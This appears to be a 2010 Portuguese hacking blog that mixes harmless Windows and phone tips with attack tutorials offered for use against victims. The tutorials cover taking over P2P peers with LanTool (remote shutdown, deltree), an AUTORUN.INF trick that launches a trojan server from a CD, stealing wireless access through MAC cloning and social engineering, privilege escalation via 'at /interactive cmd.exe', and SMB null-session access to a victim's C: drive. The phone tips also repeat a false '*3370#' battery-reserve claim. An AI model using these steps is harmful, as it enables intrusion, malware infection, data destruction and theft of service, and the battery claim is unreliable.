Invasão no Windows 8 através do Java Signed Applet

Este vulnerabilidade permite ao invasor obter qualquer dado de um computador como Windows 8, pois através de engenharia social como induzir os usuários.

Detecção de Intrusos com SNORT - Back|Track 5R3

Sistema de detecção de intrusão , nada mais é do que uma ferramenta capaz de identificar tentativas de invasão em tempo real.

Hackeando e obtendo informações de dispositivos Android

Uma técnica de "hackear" os dispositivos moveis com o sistema operacional Android. Vamos utilizar a ferramente já conhecida por alguns, o Metasploit.

terça-feira, 28 de dezembro de 2010

Não consigo utilizar o gpedit.msc ou Internet Explorer, problemas com o controle ActiveX. O que fazer? – Dica Rápida!


Pessoal este problema vem se tornando comum nos computadores principalmente com Windows XP, mas nada impede de ocorrer com outros Sistemas Operacionais da família Windows©.
O problema ocorre por causa de um bug na nova versão do Flash Player©. É o que dizem os técnicos em informática. Caso a mensagem indique que não é possível executar o ActiveX ou coisa parecida, o problema é muito fácil de se resolver.
No Windows XP, clique em INICIAR – EXECUTAR – DIGITE REGEDIT
Agora siga este caminho:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones

Ao chegar à pasta Zones, você encontrará uma subpasta cujo nome é um símbolo gráfico, normalmente um quadradinho (ficando acima do número 0). Basta apagar esta pasta, logo que pressionar Delete aparecerá uma mensagem perguntando de deseja realmente apagar a pasta e suas configurações, clique em sim. Pronto agora você poderá voltar a usar normalmente o Internet Explorer e o gpedit.msc.

domingo, 26 de dezembro de 2010

3 Utilidades escondidas no seu celular

CONHEÇA AS TRÊS UTILIDADES QUE ESTÃO ESCONDIDAS EM SEU CELULAR.
03 coisas que você nunca soube sobre seu celular.
Será útil manter essas informações com você.
Existem algumas coisas que podem ser feitas em caso de emergência.
Seu celular é uma ferramenta que pode salvar sua vida.
Veja o que ele pode fazer por você:

.
.
Emergência I
O número universal de emergência para celular é 112
Se você estiver fora da área de cobertura de sua operadora e tiver alguma emergência, disque 112 e o celular irá procurar conexão com qualquer operadora possível para enviar o número de emergência para você, e o mais interessante é que o número 112 pode ser digitado mesmo se o teclado estiver travado. Experimente!
.
.
Emergência II *3370#
Vamos imaginar que a bateria do seu celular esteja fraca. Para ativar, pressione as teclas: *3370#
Seu celular irá acionar a reserva e você terá de volta 50% de sua bateria. Essa reserva será recarregada na próxima vez que você carregar a bateria.
.
Emergência III *#06#
Para conhecer o número de série do seu celular, pressione os seguintes dígitos: *#06#
Um código de 15 dígitos aparecerá. Este número é único. Anote e guarde em algum lugar seguro. Se seu celular for roubado, ligue para sua operadora e dê esse código. Assim eles conseguirão bloquear seu celular e o ladrão não conseguirá usá-lo de forma alguma. Talvez você fique sem o seu celular, mas pelo menos saberá que ninguém mais poderá usá-lo. Se todos fizerem isso, não haverá mais roubos de celular.

sábado, 25 de dezembro de 2010

Ponto De Restauração

Primeiramente oque è um ponto de restauração ?

Vou dar uma explicação bem complexa, imagine se você pudesse voltar segundos atrás para desfazer uma besteira, seria excelente não ?, bom pelo menos no computador você pode fazer isso, isso se chama ponto de restauração , agora vamos aprender como usa lo


Criando um ponto de restauração no Windows XP


1. Clique no menu Iniciar, depois em Todos os programas > Acessórios > Ferramentas do sistema > Restauração do sistema



2. Ira abrir um assistente nele marque a opção Criar um ponto de restauração e clique em Avançar.



3. Na proxima tela, você apenas precisa determinar uma breve descrição para este ponto de restauração. Clique em “Avançar” para continuar.



4. A ultima tela e so de confirmação. Em vermelho, aparecem as informações sobre o ponto de restauração recém-criado. Basta clicar em Fechar e seu sistema estará pronto para ser restaurado quando você quiser.



Restaurando o sistema


Se você criou um ponto de restauração, teve problemas com algum aplicativo e deseja reverter a situação, basta seguir estes passos:

1. Clique no menu Iniciar, depois em Todos os programas > Acessórios > Ferramentas do sistema > Restauração do sistema



2. Marque a opção “Restaurar o computador mais cedo” e clique em “Avançar”



3. Na tela exibida, você verá um calendário. Nele estão marcados todos os dias que têm restaurações de sistema disponíveis. Lembre-se que o Windows cria pontos de restauração automaticamente. Além disso, instalações de programas também criam pontos de restauração. Por isso que há várias opções nesta hora. Você pode ir diretamente para a data da criação do seu ponto de restauração manual, utilizar a restauração mais recente ou utilizar uma anterior a uma instalação que não deu certo.



4. Clique em “Avançar” para continuar.



A próxima tela exibe o ponto de restauração selecionado e lhe informa sobre alguns detalhes que você deve saber:

a) Você não perderá documentos ou mensagens de email.

b) Este processo é reversível.

c) Durante a restauração, seu computador será desligado. Logo, você deverá fechar todos os programas em execução e salvar seus trabalhos.

d) A restauração do sistema não substitui o processo de desinstalação de um programa. Para isso, você deve utilizar o recurso “Adicionar/Remover Programas” no Painel de Controle ou o próprio desinstalador do software.

5. Pronto. Ao reiniciar o computador, você será informado sobre a restauração. Caso nenhuma alteração tenha sido encontrada, nada será feito. Caso contrário, você será informado sobre o quê foi modificado e poderá usar seu computador normalmente.

Se você é usuário dos sistemas Vista ou 7, confira os links abaixo e proteja o seu computador de diversos imprevistos!



By: Mateus

terça-feira, 21 de dezembro de 2010

Invadindo PCs em rede P2P

Invadir pc pelo ares,Emule ...
(TUTORIAL) Invadindo pc pelo Ares Msn Emule e chat
(TUTORIAL) Invadindo pc pelo Ares Msn Emule batepapo
Sabe quendo vc baixa algo no ares emule envia fotos no msn ?
Isso gerauma rede de conexão chamada TCP

Vamos usar um programa chamado LanTool, ele serve para conexão remota de redes mas com sua rede TCP ele serve para invadir.

Baixe o Programa que irmos usar
DOWNLOAD do LanTool.

Obs: O eMule é mais facil de invadir. Porque Antes de iniciar ele mostrará o IP da vitima.

Baixa e instale o Lantool
Abra o eMULE inicie um download e tambem um chat com um usuario
Abra o LanTool E repare que bem noi inicio da tela tem uma aba verde (azul...)
Escrito umas coisas assim (Server ,System)
Vá com o botão direito em cima dessa aba e selecione
INFO --Baixa e instale o Lantool
Abra o eMULE inicie um download e tbm um chat com um usuario
Abra o LanTool E repare que bem noi inicio da tela te,m uma aba verde (azul...)
Escriot umas coisas assim (Server ,System)
Vá com o botão direito emcima dessa aba e selheciona
Info >> Active conections
Vai aparecer uma lista de gente conectada através de vc na rede TCP (chat do emule,enviando no msn...)
Vc vai com o botão direto no ip conectada lá no lantool e pronto
ACTIVE ---> CONECTION
Vai aparecer uma lista de gente conectada através de vc na rede TCP (chat do emule,enviando no msn...)
Clique com o botão direto no IP conectada lá no lantool e PRONTO!

Com o botão direito noIP você pode
 - Dar shutdown
 - Eviar mewnsagens
 - E emcima da tela no programa vc pode
 - Escolher qualquer opção....
 - Executar deltree no pc dele
 - Enviar arquivos e
ETC... 


Hc Host
No Caminho Certo do Conhecimento

sexta-feira, 17 de dezembro de 2010

Infectando por CD

Material:
-1 CD virgem
-1 Servidor de Trojan
-1 Bloco de notas

Simples né?

1ºCrie um bloco de notas, e nele coloque assim:

[AutoRun]
open=nome_do_seu_server.exe
icon=nome_do_seu_server.exe,0


2º Agora, salve com o nome de: AUTORUN.INF

3ºGrave os arquivos em um cd

4º Pronto! Quando a vitima colocar o CD no pc, ela irá se infectar, isso porque esse é um comando muito usado para execução automatica de jogos e programas, mas sem uma previa verificação do arquivo fica facil trocar esse "jogo" por um servidor!

Clonando Redes Wireless

Devido ao grande crescimento desse tipo de redes pelo Brasil, e a grande falta de dinheiro no bolso do povo pra pagar conexão de internet, resolvi disponibilizar algumas informações que pode vir a dar acesso gratuido de internet.

para isso vc vai precisar de:

um cartão Wireless:
http://www.emstech.com.br/images/PCI-G361.jpg

um pigtail:
http://www.sat5.com.br/imagens/produtos/a000339.jpg

Cabo,
http://www.cndigital.com.br/images/produtos145/TEW-8000F.jpg

e uma antena wireless:
http://www.hotelthermas.com.br/IMAGES/Midia/WIRELESS.jpg

http://centros5.pntic.mec.es/desanton/wq/hunt02/pringles02.jpg


uma vez o aparato montado, baixe o programa AMAC

http://br.geocities.com/mariagasolinas2/amac.zip

Obs.: É importante lembrar que tem rede que nem é preciso clonar o MAC Adress para invadir, isso vai depender do tipo de AP que ela usa, é importante que também existem redes que pedem altenticação extra atravéz de um programa chamado BRMA, caso a rede possua esse tipo de altenticação, ai só conseguindo uma senha,,,,, porém vamos trabalhar com a ipótese de que esse programa não é utilizado pelo provedor, o que é mais comum:

descompacte o AMAC, vc notará que ele tras uma versão portável e uma instalavel, e junto vem o serial que ser ve para ambas as versões, grave os em um CD,,,, agora entra a engenhadria social,,, vc vai até a casa de um amigo seu que tenha acesso ao provedor de sua escolha,

Obs.: vc tera que ter acesso a um micro que esteja conectado direto com o provedor wireless
uma vez com acesso vc insere o Cd no driver do micro de seu amigo e executa a versão portável do programa, clica em Register, coloca o serial e clica em ok, ele vai agradecer pelo registro e bla bla bla, bla bla bla,,,

visualize dois campos na parte inferior do programa entitulados From e TO.

http://amac.paqtool.com/images/amac.jpg

neles vc coloca a faixa de ip em que vc quer scanear os mac adresses

clique em scan,,,
dependendo da velocidade em que esteja a conexão vc pode puxar o controle deslizante dele para aumentar a velocidade do scan.

ao concluir, copie os ips e macs para o bloco de notas, fexe o programa e vá pra casa, agora use a parte instalável, instale no seu micro, registre da mesma frma que fez com o outro, agora vc notará a presença de um botão novo chamado "Quick MAC Change", clique nele, ele abrirá uma caixa de dialogo,,, copie um dos macs que está anotado no arquivo do bloco de notas e cole no campo MAC, clique em CHANGE MAC, de ok, clique em exit, confirme, e saia do programa, agora clique com o botão direito em Meus Locais de rede, e clique em propriedades, clique com o botão direito do mouse na conexão de rede sem fio e clique em propriedades, seleciode: protocolo TCP/IP e clique em propriedades: de sua escolha, a conexão tem que ser feita por um cartão wireless, um AP router não vale, pois não daria para executar o próximo passo:
coloque o endereço de IP correspondente ao MAC que vc colocou lá no AMAC, coloque a mascara de subrede*, o gateway* o DNS** lcique em ok
depois em fechar, agora vá no software de configuração da placa, escolha o a rede alvo e adicione ao perfil, adicione a chave WEP* caso seja necessário, e clique em conectar,,,,, VOILÀ!!!!!! temos NET, se vc tiver feito tudo correto, sua conexão deverá estar funcionando normalmente.

Obs.: quando o verdadeiro dono da conexão entrar online, sua velocidade vai diminuir, ou até mesmo cair, a mesma coisa acontece se ele estiver usando a net e vc entrar, por isso use com moderação, e sempre mantenha uma boa lista de MSCs, para ir revesando, pq senão pode da na vista*

bom gente, por hoje é só: caso tenham qualquer dúvida é só postar ai que eu respondo namedida do possível.


* pressuponho que vc ja tenha pesquisado essas informações
** caso não saiba o DNS, coloque 4.2.2.2, é o DNS público da Embratel.

Identifique o nome de uma fonte com apenas uma imagem dela

Encontre  qualquer fonte a partir da imegem !
Simplesmente tire um Print Screen, faça o UpLoad e o site identificará a fonte!

O nome do site  é: My Fonts (http://new.myfonts.com/WhatTheFont/)

 O serviço é bem simples e rápido. Primeiro, Salve a imagem onde está a fonte (arquivo com no máximo 2mb). Após, na seção Upload a File no site, clique em Browse. Localize a imagem e abra. Você também pode optar por copiar a URL da imagem e colar em Specify a URL. Clique em Continue.


Na página que abrirá identifique letra por letra. O site automaticamente já identifica algumas letras. Vá em Continue. Logo após, o site mostra fontes que são parecidas com a fonte da imagem. O serviço de download pelo próprio site é pago, então copie o nome da fonte que você mais gostou e jogue no Google, opções de download não faltarão.

domingo, 12 de dezembro de 2010

Vire administrador no Windows

Fora identificado uma vulnerabilidade no windows xp, onde é possível escalar privilégios de administrador, sem cds de boot ou modo de segurança default, a falha encontra-se no comando at junto ao cmd do windows xp, cujo o mesmo tem nível um administrativo.

O que é AT?

AT é um agendador de tarefas, no qual você pode agendar uma tarefa para execução de uma função ou arquivo.

Como é explorado essa falha?

Procedimentos seguites são:

Iniciar>Executar>cmd.exe


Se apareceu "Acesso Negado" tente Command.com no lugar de cmd.exe, caso ainda esteja acesso negado, vc está sem sorte, procure outro meio de escalar privilégios, ou por conta convite. bom caso tenha dado certo, faça como adiante:

at hora /interactive "cmd.exe"


Onde AT é o agendador, hora seria a hora que o agendador irá executar o processo solicitado, /interactive permite que o trabalho interaja com a area de trabalho do usuário que estiver conectado quando o trabalho estiver sendo executado.

no lugar de hora, coloque as horas reais, por exemplo, agora são 07:05 então faça at 07:06 /interactive "cmd.exe"

quando for 07:06 o aparecerá um novo prompt de comando, ou seja o cmd.exe como administrador está sendo executado.


De Ctrl + alt + del , va em processos, finalizar explorer.exe, e dentro do prompt de comando aberto o novo cmd, execute explorer.exe, espere até ele reiniciar só o explorer, quando abrir vá em Iniciar e la em cima onde fica o nome do usuário estará escrito SYSTEM, pronto está em Modo Administrador, agora, vc pode fazer o que quiser com o sistema, des de criar, apagar contas etcs.  

Invadindo o Windows

Neste tutorial vamos aprender a invadir o windows pela porta 445.

Mais sobre a porta 445
- A porta TCP 445 é do SMB (Server Message Block), que serve para compartilhamento de arquivos. A partir do Windows 2000, a Microsoft trocou as famosas TCP 139 e UDP 137-138, fazendo o SMB trafegar direto em cima do TCP/IP, pela 445. Ou seja, na sua rede interna, é um mal necessário. Já no firewall, na saída para Internet, deve ser fechada sempre, tanto inbound quanto outbound.

Como saber se a porta 445 está aberta
Muito simples digite netstat -an na cmd e aparecerá suas conexões ativas.

Programas utilizados
- Dump users:
http://unknow-ro0t.freeweb7.com/Dump_users.rar
Depois de baixar o dumpusers extraia ele para a pasta windows.


- Zenmap.org

http://www.superdownloads.com.br/download/109/nmap/
Agora que você baixou o nmap scaneie o IP da vítima e veja se a tal porta 445 está aberta.


Como efetura a invasão

Vamos dizer que (xxx.xxx.xxx.xxx) é o IP da vítima,para saber se este IP é do brasil basta que você olhe os números iniciais que são chamados ranges, que são utilizados para definir de onde é um certo indereço de IP.

1. Vá até a prompt de comando e didigte:
net use \\xxx.xxx.xxx.xxx\ipc$ "" /u:""

2. Abra outra CMD e digite:
dumpusers -target xxx.xxx.xxx.xxx -type notdc -start 1 -stop 900 -mode verbose

3. Abra o executar e digte:

iniciar>executar>\\xxx.xxx.xxx.xxx\c$

Pronto,agora o disco local da vítima está shared com você.